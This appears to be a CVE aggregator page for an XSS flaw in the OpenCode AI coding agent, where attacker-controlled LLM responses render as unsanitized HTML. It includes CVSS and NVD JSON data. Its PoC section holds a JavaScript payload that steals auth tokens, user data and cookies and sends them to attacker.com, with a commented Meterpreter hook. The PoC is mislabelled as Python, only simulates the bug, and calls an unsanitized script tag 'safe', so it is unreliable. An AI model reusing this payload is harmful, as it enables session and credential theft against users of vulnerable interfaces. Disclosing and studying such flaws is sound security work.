CVE-2026-22813

Description

OpenCode is an open source AI coding agent. The markdown renderer used for LLM responses will insert arbitrary HTML into the DOM. There is no sanitization with DOMPurify or even a CSP on the web interface to prevent JavaScript execution via HTML injection. This means controlling the LLM response for a chat session gets JavaScript execution on the http://localhost:4096 origin. This vulnerability is fixed in 1.1.10.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:anoma:opencode:*:*:*:*:*:-:*:* - VULNERABLE

OpenCode < 1.1.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22813 PoC - XSS via Markdown Renderer in OpenCode
// This PoC demonstrates how to inject arbitrary JavaScript through LLM responses

// Malicious payload that can be injected as an LLM response
const maliciousPayload = `
<img src=x onerror="
  // Steal sensitive data from localStorage
  const tokens = localStorage.getItem('auth_tokens');
  const userData = localStorage.getItem('user_info');
  
  // Exfiltrate data to attacker-controlled server
  fetch('https://attacker.com/exfil', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
      tokens: tokens,
      userData: userData,
      cookies: document.cookie,
      timestamp: new Date().toISOString()
    })
  });
  
  // Alternative payload: Session hijacking
  // InjectBeEForMeterpreterPayload();
">
`;

// Simulated LLM response injection
function simulateLLMResponseInjection(response) {
  // In vulnerable version, this directly inserts HTML without sanitization
  const chatContainer = document.getElementById('chat-messages');
  chatContainer.innerHTML += `<div class="message assistant">${response}</div>`;
}

// Execute the PoC
simulateLLMResponseInjection(maliciousPayload);

// Clean payload example (what should be done)
const safePayload = `
<script>
  // This should be sanitized before rendering
  console.log('Safe rendering required');
</script>
`;

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22813
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22813
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22813/
[4] VulDB https://vuldb.com/cve/CVE-2026-22813
[5] https://github.com/anomalyco/opencode/security/advisories/GHSA-c83v-7274-4vgp
[6] https://github.com/anomalyco/opencode/security/advisories/GHSA-c83v-7274-4vgp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22813", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:53.523", "lastModified": "2026-01-21T15:15:35.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenCode is an open source AI coding agent. The markdown renderer used for LLM responses will insert arbitrary HTML into the DOM. There is no sanitization with DOMPurify or even a CSP on the web interface to prevent JavaScript execution via HTML injection. This means controlling the LLM response for a chat session gets JavaScript execution on the http://localhost:4096 origin. This vulnerability is fixed in 1.1.10."}, {"lang": "es", "value": "OpenCode es un agente de codificación de IA de código abierto. El renderizador de markdown utilizado para las respuestas del LLM insertará HTML arbitrario en el DOM. No hay sanitización con DOMPurify ni siquiera una CSP en la interfaz web para evitar la ejecución de JavaScript a través de la inyección de HTML. Esto significa que controlar la respuesta del LLM para una sesión de chat obtiene la ejecución de JavaScript en el origen http://localhost:4096. Esta vulnerabilidad está corregida en 1.1.10."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anoma:opencode:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.1.10", "matchCriteriaId": "521FFCAB-C7CA-4867-9674-B8AF2637091E"}]}]}], "references": [{"url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-c83v-7274-4vgp", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}, {"url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-c83v-7274-4vgp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory", "Exploit"]}]}}